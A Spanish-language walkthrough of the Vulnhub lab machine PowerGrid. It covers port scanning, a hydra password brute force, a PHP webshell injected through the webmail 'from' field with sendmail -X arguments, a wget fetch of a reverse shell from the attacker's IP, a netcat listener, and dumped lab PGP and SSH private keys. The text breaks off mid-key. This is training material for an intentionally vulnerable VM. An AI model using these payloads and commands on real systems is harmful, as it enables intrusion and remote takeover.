LaCashita!

[VLN] PowerGrid

Hoy vamos a hackear la maquina de Vulnhub llamada PowerGrid. Podeis descargarla desde el siguiente enlace: PowerGrid

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


~ > nmap -A -p- 192.168.1.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 10:42 CEST
Nmap scan report for powergrid.home (192.168.1.147)
Host is up (0.00051s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: PowerGrid - Turning your lights off unless you pay.
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: more capabilities IMAP4rev1 post-login IDLE have STARTTLS 
ID ENABLE SASL-IR Pre-login OK LOGINDISABLEDA0001 LOGIN-REFERRALS listed 
LITERAL+
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after:  2030-05-17T16:49:55
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imap Dovecot imapd
|_imap-capabilities: more IMAP4rev1 LITERAL+ post-login have capabilities ID 
ENABLE SASL-IR Pre-login OK LOGIN-REFERRALS IDLE listed AUTH=PLAINA0001
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after:  2030-05-17T16:49:55
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.79 seconds

Investigamos un poco mas el puerto 80.


~ > gobuster dir -u http://192.168.1.147 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.147
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/18 10:43:27 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/images (Status: 301)
/server-status (Status: 403)
/zmail (Status: 401)
===============================================================
2020/07/18 10:43:32 Finished
===============================================================

En la pagina inicial, vemos 3 posibles usuarios. Por otro lado, gobuster encuentra el directorio /zmail, el cual al entrar nos pide usuario y password. Usamos hydra para hacer bruteforce y ver si obtenemos algun password, en este caso probamos con el usuario p48.


~ > hydra -l p48 -P rockyou.txt 192.168.1.147 http-get -m /zmail
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-18 
10:44:18
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip 
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries 
(l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.1.147:80/zmail
[STATUS] 8574.00 tries/min, 8574 tries in 00:01h, 14335825 to do in 27:53h, 16 
active
[STATUS] 8741.00 tries/min, 26223 tries in 00:03h, 14318176 to do in 27:19h, 16 
active
[STATUS] 8754.43 tries/min, 61281 tries in 00:07h, 14283118 to do in 27:12h, 16 
active
[80][http-get] host: 192.168.1.147   login: p48   password: electrico
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-18 
10:57:20

Vemos que hydra encuentra que electrico es la password del usuario p48. Entramos usando los credenciales. En el mail encontramos:


Listen carefully. We are close to our attack date. Nothing is going to stop us 
now. Our malware is heavily planted in each power grid across Europe. 
All it takes is a signal from this server after the timer has stopped, and 
nothing is going to stop that now. 
For information, I have setup a backup server located on the same network - you 
shouldn't need to access it for now, but if you do, scan for its local IP and 
use the SSH key encrypted below (it is encrypted with your GPG key, by the 
way). 
The backup server has root access to this main server - if you need to make any 
backups, I will leave it for you to work out how. 
I haven't got time to explain - we are too close to launching our hack.

-----BEGIN PGP MESSAGE-----

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
RO1va5L9lriZ1vmP37FxIwsrCVVcNrPJxWydvw==
=fPY9
-----END PGP MESSAGE-----

Podemos ver que menciona que el mensaje esta encriptado con nuestra key privada gpg, y que hay un server de "backup", el cual tiene acceso como root al sistema principal...

Exploitation

Por otro lado al mirar la version de Zmail vemos que la version es 1.2.2 y que es vulnerable al siguiente exploit[1]. Tras leer el POC vemos que tenemos que modificar el subject con un codigo php que queremos que se ejecute, y al enviar el correo deberemos modificar el "from", donde le pasaremos unos parametros para que nos guarde lo que contiene el subject como un fichero php, al cual podremos acceder. Sabiendo esto, arrancamos Burpsuite. Creamos un nuevo correo y como subject ponemos:


<?php echo passthru($_GET['cmd']);?>

Como destinatario podemos poner example@example.com Le damos a enviar e interceptamos la peticion con Burp. Una vez interceptada, modificamos el campo from para que contenga:


example@example.com -OQueueDirectory=/tmp -X/var/www/html/rcd.php

Quedando la peticion completa de la siguiente manera:


_token=HgFFyrvy6T4h7WYUCQl20un8zmC8njDr&_task=mail&_action=send&_id=3126497615f1
2bda339191&_attachments=&_from=example@example.com -OQueueDirectory=/tmp 
-X/var/www/html/rcd.php&_to=p48%40localhost.com&_cc=&_bcc=&_replyto=&_followupto
=&_subject=%3C%3Fphp+echo+passthru%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&editorS
elector=plain&_priority=0&_store_target=Sent&_draft_saveid=&_draft=&_is_html=0&_
framed=1&_message=

Una vez hecho esto, podemos ejecutar comandos a traves de: http://192.168.1.147/rcd.php?cmd=id Preparamos una reverse shell.


~ > cp /usr/share/webshells/php/php-reverse-shell.php .
~ > mv php-reverse-shell.php rshell.php
~ > nano rshell.php #Modificamos para poner nuestra IP.
~ > mv rshell.php /var/www/html

Nos descargamos nuestra reverse shell:


http://192.168.1.147/rcd.php?cmd=wget%20http://192.168.1.111/rshell.php

Ponemos nc a la escucha:


/var/www/html > nc -nlvp 1234
listening on [any] 1234 ...

Por ultimo, para conseguir nuestra reverse shell accedemos a: http://192.168.1.147/rshell.php

Low Shell


/var/www/html > nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.147] 49656
Linux powergrid 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 
GNU/Linux
 10:20:23 up 40 min,  0 users,  load average: 0.00, 0.00, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@powergrid:/$

Exploramos el sistema.


www-data@powergrid:/home$ su p48
Password: electrico
p48@powergrid:/home$ cd ~
p48@powergrid:~$ ls
mail  privkey.gpg
p48@powergrid:~$ cat privkey.gpg
-----BEGIN PGP PRIVATE KEY BLOCK-----

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
O/LG7NOgNrGl6THJtM0huhXOtewCOFA/
=KOs+
-----END PGP PRIVATE KEY BLOCK-----

Obtenemos la privatekey.gpg, con esto ya tendriamos El mensaje cifrado, la key y la password(electrico). Vamos a la siguiente web: https://www.igolder.com/pgp/decryption/ E introducimos los datos necesarios para hacer el decode del mensaje cifrado. Una vez hecho obtenemos la key ssh. Una vez tenemos la key, creamos un fichero en el sistema con ella.


p48@powergrid:~$ echo "-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAgEAsBNVFExFUwpIaHIhMQDlu8mFwkNZWRFWBS5qE3BUUhk39/3CeAv2
81W7Z/63EM78eE1PjiccpNA5Vi2r+nfYLS6Nj7qy11BQsGlUKgmcxW79DdmC78LaFHUkYh
G3KtnJcLh4GAlPXoOwwXgwT8iu6dbxXGOzONCrWTTQ7/UjgJOcVIx9814uBDbZAYlXyjvN
aMnrO16Jff00wurmqNfq8D0lLWiU9Wq+9j5z+XvqHGaei3s3Wdhfoc3jtPfwUFsKSlVrQM
nj1i/43XOogwaPAThXRf21yfw5AIworT/xFHuAPlpWpT8z0KV8I4Z+DdiB4fHMtgWJ+t7O
